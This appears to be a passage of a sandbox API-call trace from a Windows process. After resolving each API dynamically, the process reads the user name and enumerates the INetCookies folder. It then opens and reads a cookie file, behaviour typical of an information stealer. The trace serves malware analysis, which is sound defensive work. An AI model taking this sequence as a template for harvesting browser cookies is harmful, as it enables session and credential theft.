GetProcessHeap () returned 0x5f0000 [0181.319] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f3c0 [0181.320] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.320] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.320] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies") returned 65 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.320] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3c0 [0181.320] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindFirstFileA") returned 0x7ffb2625d940 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.320] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.320] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\*", lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xda6ebc77, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xda6ebc77, ftLastWriteTime.dwHighDateTime=0x1d7b3c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName=".", cAlternateFileName="")) returned 0x6200f0 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.320] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f3c0 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.320] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.320] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.320] GetProcessHeap () returned 0x5f0000 [0181.321] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.321] GetProcessHeap () returned 0x5f0000 [0181.321] GetProcessHeap () returned 0x5f0000 [0181.321] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f490 [0181.321] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.321] GetProcessHeap () returned 0x5f0000 [0181.321] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.321] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f3c0, Size=0x102) returned 0x624e10 [0181.321] GetProcessHeap () returned 0x5f0000 [0181.321] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f3c0 [0181.321] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="GetUserNameA") returned 0x7ffb28a80f00 [0181.321] GetProcessHeap () returned 0x5f0000 [0181.321] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.321] GetUserNameA (in: lpBuffer=0x624e10, pcbBuffer=0x5cfd30 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x5cfd30) returned 1 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f3c0 [0181.328] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenA") returned 0x7ffb26250c60 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.328] lstrlenA (lpString="RDhJ0CNFevzX") returned 12 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f3c0 [0181.328] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f3c0 [0181.328] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f3c0 | out: hHeap=0x5f0000) returned 1 [0181.328] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624e10, Size=0xd) returned 0x61f3c0 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6360a0 [0181.328] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0181.328] GetProcessHeap () returned 0x5f0000 [0181.328] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6360a0 | out: hHeap=0x5f0000) returned 1 [0181.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x61f3c0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0181.329] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysAllocStringLen") returned 0x7ffb288fe5b0 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x6360c0 [0181.329] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6360c0 | out: hHeap=0x5f0000) returned 1 [0181.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x61f3c0, cbMultiByte=12, lpWideCharStr=0x613a78, cchWideChar=12 | out: lpWideCharStr="RDhJ0CNFevzX") returned 12 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636260 [0181.329] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636260 | out: hHeap=0x5f0000) returned 1 [0181.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RDhJ0CNFevzX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.329] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.329] GetProcessHeap () returned 0x5f0000 [0181.330] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f4f0 [0181.330] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4f0 | out: hHeap=0x5f0000) returned 1 [0181.330] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0xd) returned 0x61f530 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636300 [0181.330] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x636300 | out: hHeap=0x5f0000) returned 1 [0181.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RDhJ0CNFevzX", cchWideChar=12, lpMultiByteStr=0x61f530, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDhJ0CNFevzX", lpUsedDefaultChar=0x0) returned 12 [0181.330] GetProcAddress (hModule=0x7ffb288f0000, lpProcName="SysFreeString") returned 0x7ffb28900ae0 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd) returned 0x61f4f0 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f530 | out: hHeap=0x5f0000) returned 1 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f620 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f5c0 [0181.330] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.330] GetProcessHeap () returned 0x5f0000 [0181.330] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.331] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xda6ebc77, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xda6ebc77, ftLastWriteTime.dwHighDateTime=0x1d7b3c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="..", cAlternateFileName="")) returned 1 [0181.331] GetProcessHeap () returned 0x5f0000 [0181.331] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f510 [0181.331] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileA") returned 0x7ffb2625d9a0 [0181.331] GetProcessHeap () returned 0x5f0000 [0181.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.331] FindNextFileA (in: hFindFile=0x6200f0, lpFindFileData=0x5cfba0 | out: lpFindFileData=0x5cfba0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda6e33be, ftCreationTime.dwHighDateTime=0x1d7b3c9, ftLastAccessTime.dwLowDateTime=0xda6e33be, ftLastAccessTime.dwHighDateTime=0x1d7b3c9, ftLastWriteTime.dwLowDateTime=0xda6e5aef, ftLastWriteTime.dwHighDateTime=0x1d7b3c9, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x0, dwReserved1=0x5cf618, cFileName="2OH9TBLH.txt", cAlternateFileName="")) returned 1 [0181.331] lstrcpynA (in: lpString1=0x5cfad2, lpString2="2OH9TBLH.txt", iMaxLength=260 | out: lpString1="2OH9TBLH.txt") returned="2OH9TBLH.txt" [0181.331] lstrlenA (lpString="*") returned 1 [0181.331] GetProcessHeap () returned 0x5f0000 [0181.331] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5c0 [0181.331] lstrcpyA (in: lpString1=0x61f5c0, lpString2="*" | out: lpString1="*") returned="*" [0181.331] GetProcessHeap () returned 0x5f0000 [0181.331] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f560 [0181.331] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateFileA") returned 0x7ffb2625d8a0 [0181.331] GetProcessHeap () returned 0x5f0000 [0181.331] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.331] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\2OH9TBLH.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcookies\\2oh9tblh.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.332] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetFileSize") returned 0x7ffb2625da90 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.332] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21b [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f660 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.332] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.332] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.332] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f660, Size=0x21c) returned 0x624e10 [0181.332] GetProcessHeap () returned 0x5f0000 [0181.332] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x9) returned 0x61f580 [0181.333] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ReadFile") returned 0x7ffb2625dbd0 [0181.333] GetProcessHeap () returned 0x5f0000 [0181.333] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.333] ReadFile (in: hFile=0x24c, lpBuffer=0x624e10, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x5cf628, lpOverlapped=0x0 | out: lpBuffer=0x624e10*, lpNumberOfBytesRead=0x5cf628*=0x21b, lpOverlapped=0x0) returned 1 [0181.333] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.334] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.334] CloseHandle (hObject=0x24c) returned 1 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x21c) returned 0x625040 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624e10 | out: hHeap=0x5f0000) returned 1 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f580 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.334] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] GetProcessHeap () returned 0x5f0000 [0181.334] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.335] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.335] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x5) returned 0x61f590 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f580, Size=0x21c) returned 0x624e10 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5d0 [0181.335] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5d0 | out: hHeap=0x5f0000) returned 1 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f480 [0181.335] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.335] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f590, Size=0x9) returned 0x61f600 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5b0 [0181.335] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5b0 | out: hHeap=0x5f0000) returned 1 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] GetProcessHeap () returned 0x5f0000 [0181.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f580 [0181.336] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.336] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x11) returned 0x6363a0 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f540 [0181.336] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f630 [0181.336] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.336] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6363a0, Size=0x21) returned 0x613b30 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f560 [0181.336] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f560 | out: hHeap=0x5f0000) returned 1 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] GetProcessHeap () returned 0x5f0000 [0181.336] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f540 [0181.337] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.337] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613b30, Size=0x1d) returned 0x636400 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625040 | out: hHeap=0x5f0000) returned 1 [0181.337] lstrlenA (lpString="\n") returned 1 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.337] lstrcpyA (in: lpString1=0x61f510, lpString2="\n" | out: lpString1="\n") returned="\n" [0181.337] lstrlenA (lpString="MUID\n392F526C06816A85186842D307536B22\nmicrosoft.com/\n1025\n1130274944\n30991936\n3493185191\n30912613\n") returned 98 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x63) returned 0x611f60 [0181.337] lstrcpyA (in: lpString1=0x611f60, lpString2="MUID\n392F526C06816A85186842D307536B22\nmicrosoft.com/\n1025\n1130274944\n30991936\n3493185191\n30912613\n" | out: lpString1="MUID\n392F526C06816A85186842D307536B22\nmicrosoft.com/\n1025\n1130274944\n30991936\n3493185191\n30912613\n") returned="MUID\n392F526C06816A85186842D307536B22\nmicrosoft.com/\n1025\n1130274944\n30991936\n3493185191\n30912613\n" [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f630 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f600 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f640 [0181.337] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.337] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.337] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.337] GetProcessHeap () returned 0x5f0000 [0181.338] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.338] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f600, Size=0x5) returned 0x61f640 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f630, Size=0x63) returned 0x625ca0 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.338] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0x9) returned 0x61f660 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f640 [0181.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.338] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.338] GetProcessHeap () returned 0x5f0000 [0181.338] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.339] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f660, Size=0x11) returned 0x6360a0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5c0 [0181.339] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.339] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.339] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360a0, Size=0x21) returned 0x613aa0 [0181.339] GetProcessHeap () returned 0x5f0000 [0181.339] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 